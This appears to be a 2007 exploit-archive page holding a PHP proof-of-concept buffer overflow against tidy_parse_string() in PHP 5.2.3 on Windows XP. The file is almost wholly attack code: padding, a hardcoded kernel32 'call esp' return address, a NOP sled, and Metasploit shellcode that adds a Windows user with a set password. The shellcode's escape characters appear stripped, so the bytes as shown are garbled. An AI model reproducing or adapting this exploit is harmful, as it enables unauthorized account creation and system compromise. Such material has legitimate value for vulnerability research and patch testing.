Home / exploitsPDF  

php523-overflow.txt

Posted on 20 June 2007

<?php //PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local //buffer overflow poc (win) //rgod //site: retrogod.altervista.org //quickly tested on xp sp2, worked both from the cli and on apache //let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} # win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com $scode = "xfcxbbx0bxadx7dx9axebx0cx5ex56x31x1exadx01xc3x85". "xc0x75xf7xc3xe8xefxffxffxffxf7x45x39x9ax07x96x49". "xdfx3bx1dx31xe5x3bx20x25x6exf4x3ax32x2ex2ax3axaf". "x98xa1x08xa4x1ax5bx41x7ax85x0fx26xbaxc2x48xe6xf1". "x26x57x2axeexcdx6cxfexd5x29xe7x1bx9ex6dx23xe5x4a". "xf7xa0xe9xc7x73xe9xedxd6x68x9ex12x52x6fx4bxa3x38". "x54x8fx77xf1x54xebxfcxb2x64x76xc2x4bx89xf3x83xa7". "x1ax73x18x15x97x1bx28x8exa1x50xa8xe0xb2x66xa9x8b". "xdbx5axf6xbaxedxc2x5ex34xe9x81x9fx3dx5axedxf0x0c". "xbax8dx66x09xc5xc7x79x7exc5x30xe6xedx5dx90x8cx95". "xf8xccx61x05x23x62x1bxbdx03x0fx90x58x36xcfx25xd6". "xd8x2fxbex62x50x0fx11xd2xdex0bx4dxf2xf8xb3xe3x9f". "x70x93x97x30x1axb2x0bxa8xaex5bxa1x46x6fxe2x2dxca". "x06x8axc4x67xadx20x76xfcx22xb6x0bxdcxcfx43x82x3c". "x1fxeax1ex79x5fxecx9ex81x5f"; $EIP="x8Bx51x81x7C"; //0x7C81518B call esp kernel32.dll $NOP=str_repeat("x90",12); $____buff=str_repeat("a",2036).$EIP.$NOP.$scode; tidy_parse_string(1,$____buff,1); ?>

 

TOP